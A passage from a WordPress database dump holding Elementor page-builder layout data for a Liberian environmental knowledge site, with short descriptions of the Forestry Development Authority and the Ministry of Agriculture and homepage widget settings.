ut_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17511,2580,'_thumbnail_id','2035'),(17512,1582,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17513,2581,'_elementor_edit_mode','builder'),(17514,2581,'_elementor_template_type','wp-post'),(17515,2581,'_elementor_version','2.7.5'),(17516,2581,'_wp_page_template','default'),(17517,2581,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3dbc9ac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f919375\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1d953c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15781ca\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"fda\\\",\\\"tag_id\\\":\\\"53\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"fda\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f10ae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7e78c45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1160609\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17520,1586,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17521,2582,'_elementor_edit_mode','builder'),(17522,2582,'_elementor_template_type','wp-post'),(17523,2582,'_elementor_version','2.7.5'),(17524,2582,'_wp_page_template','default'),(17525,2582,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b499042\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e7777d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"95e395c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ecf4b97\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"moa\\\",\\\"tag_id\\\":\\\"61\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"moa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc19bed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1cf2e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d176b2f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17527,1600,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17540,2588,'_wp_page_template','default'),(17541,2588,'_elementor_edit_mode','builder'),(17542,2588,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_an